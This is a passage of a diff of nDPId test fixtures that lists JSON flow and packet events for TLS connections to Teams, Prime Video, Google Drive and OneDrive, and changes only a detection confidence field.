AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495650748,"flow_last_seen":1646495650768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495650768,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":467,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495650748,"flow_last_seen":1646495650804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4443,"flow_avg_l4_payload_len":740,"midstream":0,"thread_ts_msec":1646495650804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","server_names":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"104071bf77c5f0d7bae5f17542ba9428","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=teams.office.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"27:20:65:85:4C:34:BF:09:F0:25:56:B8:50:A7:4D:38:8C:45:82:80"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495650748,"flow_last_seen":1646495650768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495650768,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":467,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495650748,"flow_last_seen":1646495650804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4443,"flow_avg_l4_payload_len":740,"midstream":0,"thread_ts_msec":1646495650804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","server_names":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"104071bf77c5f0d7bae5f17542ba9428","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=teams.office.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"27:20:65:85:4C:34:BF:09:F0:25:56:B8:50:A7:4D:38:8C:45:82:80"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495669804,"flow_last_seen":1646495669804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495669804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1646495669804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669804,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GxZAAEAGN4nAqAGAbIq5aoOAAbvmWe+jAAAAAKAC+vCvxQAAAgQFtAQCCAqEU9WfAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1646495669812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669812,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8yYIAAPcGEhxsirlqwKgBgAG7g4CERzW35lnvpKAS\/\/\/nPAAAAgQFoAQCCArIqUDThFPVnwEDAwg="} 01164{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1646495669817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495669817,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5GxhAAEAGNYrAqAGAbIq5aoOAAbvmWe+khEc1uIAYAfZdLwAAAQEICoRT1avIqUDTFgMBAgABAAH8AwN96ffJWUDTazcjPKRqPmlOCDA7EP6e0q+5Knlqzgn4siDXwLeA2RnsV46x7ZH7OaLw+Chjc3EP4ZBJc+xWJC0l1wAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cucHJpbWV2aWRlby5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgGExhTuOW51jqeKeMnZIkirN5TNVDUu2atdTJKyWyDBgAFwBBBNa6zHPDKyGGZ8TLrmG8xe75hAb+vBq5zYOy2EFwzMFPukEZchYJ5onOljVZmDEEihxmPvbweI2eyfjNpyF4jCAAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495669804,"flow_last_seen":1646495669817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495669817,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":473,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495669824,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495669804,"flow_last_seen":1646495669817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495669817,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":473,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495669824,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495697787,"flow_last_seen":1646495697787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495697787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1646495697787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TvVAAEAG4RXAqAGAjvq5jtyKAbuisGnHAAAAAKAC+vDU+wAAAgQFtAQCCAq56si5AAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1646495697803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697803,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8kPwAAHIGrI6O+rmOwKgBgAG73IpV9E4KorBpyKAS\/\/903wAAAgQFlgQCCAoX\/J8euerIuQEDAwg="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1646495697805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495697805,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5TvdAAEAG3xbAqAGAjvq5jtyKAbuisGnIVfROC4AYAfb\/+QAAAQEICrnqyMsX\/J8eFgMBAgABAAH8AwMm2R5Ju93q7BO1hUBCbI67+PD2u7\/isSvjCgLKpqok\/yCAWXfAe1hCLkH2e7v9afeyqpqQSwrsncirtbeBJ9H19AAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBkcml2ZS5nb29nbGUuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIN3ozE7d4X5ID5WvLeFvcVfA+y6MygI54w6MzPaYwOcyABcAQQTFpbayzL1z3QPN8cTTIDg5o4CXfe8\/xuT5UCf9QOlCuSljPogKq5ahl7f7neEgUhdrgF5Z8PWW8a+71cG5NS4HACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495697787,"flow_last_seen":1646495697805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495697805,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":477,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495697827,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495697787,"flow_last_seen":1646495697805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495697805,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":477,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495697827,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710343,"flow_last_seen":1646495710343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710343,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1646495710343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710343,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tchAAEAGPx\/AqAGADVF2W4FOAbtTwyfkAAAAAKAC+vBryAAAAgQFtAQCCAom4HXhAAAAAAEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1646495710376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0mxFAAG4GK94NUXZbwKgBgAG7gU7a1m2vU8Mn5YAS\/\/\/iBwAAAgQFoAEDAwgBAQQC"} 01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1646495710381,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710381,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAIttcpAAEAGPSzAqAGADVF2W4FOAbtTwyfl2tZtsFAYAfZlCgAAFgMBAgABAAH8AwMcPgJU1zrnl+hPKuEgTOmCA8DSxG0x4ZP+nrnS1ukwmSB2tLYK4RsCmYHQ+tv7RzCytXVHC3ipih0buXJEGgMzzAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxvbmVkcml2ZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgkhEItWzjEiug\/WBaiPCJVLwOMCFSobcq6gZ3ZM5d7hUAFwBBBKUDUTjCPdZ8Ll1S+z857hqnZsJZ3Vatea3adXIfU3XxBdTrso0nY7PLm8teDMagz\/bdRE3yXoqXxIphrdW4ROsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710343,"flow_last_seen":1646495710381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710381,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":484,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646495710343,"flow_last_seen":1646495710415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6356,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1646495710415,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"67bfe5d15ae567fb35fd7837f0116eec","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"50:2F:33:10:92:AC:27:7B:17:BE:82:68:3B:E2:29:AD:97:41:B7:BB"}} +00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710343,"flow_last_seen":1646495710381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710381,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":484,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646495710343,"flow_last_seen":1646495710415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6356,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1646495710415,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"67bfe5d15ae567fb35fd7837f0116eec","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"50:2F:33:10:92:AC:27:7B:17:BE:82:68:3B:E2:29:AD:97:41:B7:BB"}} 